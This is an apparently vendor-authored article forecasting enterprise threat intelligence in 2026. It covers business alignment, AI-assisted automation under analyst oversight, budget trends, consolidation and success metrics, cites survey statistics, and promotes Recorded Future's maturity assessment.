Envisioning Threat Intelligence in 2026: Proactive, Integrated, and Business-Aligned

In the near future, leading enterprises will treat threat intelligence not as a side task but as a strategic function integrated into business processes. This means embedding threat insights directly into risk assessments, vulnerability management, and even board-level decisions on security (notably, 58% of organizations already use threat intelligence to guide business risk assessment decisions today).

Instead of simply reacting to incidents after they occur, advanced threat intelligence programs will analyze patterns and emerging trends to warn of potential attacks before they fully materialize. This doesn’t mean magically “knowing the future,” but sharpening awareness by connecting subtle signals across many sources and mapping them to one’s environment.

Human analysts will still be central for this kind of work, though their capabilities will be augmented by AI such that detection and response happen at machine speed. Intelligence platforms will automatically enrich new indicators, correlate them with ongoing events, and even trigger protective actions in real time—all with analysts overseeing the entire process.

Ultimately, a mature program in 2026 will be measured by the outcomes it enables and the risk it reduces for the organization. This means protecting the assets, uptime, and reputation the business cares about, and improving decision quality at all levels of management.

Implications for 2026 Security Budgets and Investments

As threat intelligence becomes more central to security strategy, it’s also becoming a bigger line item in budgets. In fact, 91% of organizations plan to increase their threat intelligence spending in 2026, reflecting its critical role in an era of escalating cyber threats.

One likely area for these increased funds is platform consolidation. Many teams are reevaluating their myriad point solutions and considering a move to more integrated platforms that unify multiple sources and use cases, reducing complexity and cost over time.

Another likely investment will be in automation and AI capabilities. With cyber talent scarce and alert volumes ever-increasing, it will be vital to budget for tools that automate threat intelligence workflows end-to-end. From data collection and enrichment to triage and even initial response, automation will be key to doing more with the same team.

Organizations should also ensure that new investments deliver contextual intelligence tailored to their business. It’s not enough to simply buy more feeds or tools that spit out data; the value lies in solutions that fuse internal data with external threat feeds and apply analytics to highlight what matters most.

That said, not every organization will have the same needs and challenges. The key to fully maximizing ROI will be aligning spending with the organization’s biggest gaps and pain points. If credibility of data is a major challenge, invest in sources with proven reliability or validation features. If integration is a key issue, focus spending on consolidation projects or appropriate vendor services.

Security teams should also establish clear metrics (such as reduced incident response time or incidents prevented) to measure the impact of threat intelligence investments. For example, over half (54%) of organizations now measure success by improved detection and response times, making it a top metric for demonstrating value delivered by threat intelligence initiatives.

Charting the Course to 2026

Enterprise threat intelligence is undoubtedly maturing and becoming more ingrained in security programs, yet much work still remains. Nearly half of organizations may call themselves “advanced” today, but truly predictive, integrated intelligence at scale is still a goalpost ahead. In looking toward 2026, security leaders should double down on the fundamentals that drive intelligence maturity: integration, automation, and alignment with business priorities.

By breaking down silos between tools and teams, trusting and acting on intelligence through improved data credibility and context, and continually measuring what works, teams can evolve from reactive defense to an anticipatory, intelligence-driven security posture.

So what are some practical next steps? First, it’s wise to benchmark your organization’s current program to identify gaps and opportunities. Tools like Recorded Future’s Threat Intelligence Maturity Assessment provide a structured way to evaluate where you stand today and get tailored recommendations on how to improve.

With that insight, you can develop a roadmap that includes the right people, process, and technology investments to operationalize threat intelligence in the most efficient way. Keep the big picture in mind: the ultimate aim is to see more threats, identify them faster, and take action to reduce risk before damage is done. With a thoughtful strategy and an eye towards these trends, organizations can chart a course from today’s challenges to a more proactive and resilient threat intelligence function in 2026 and beyond.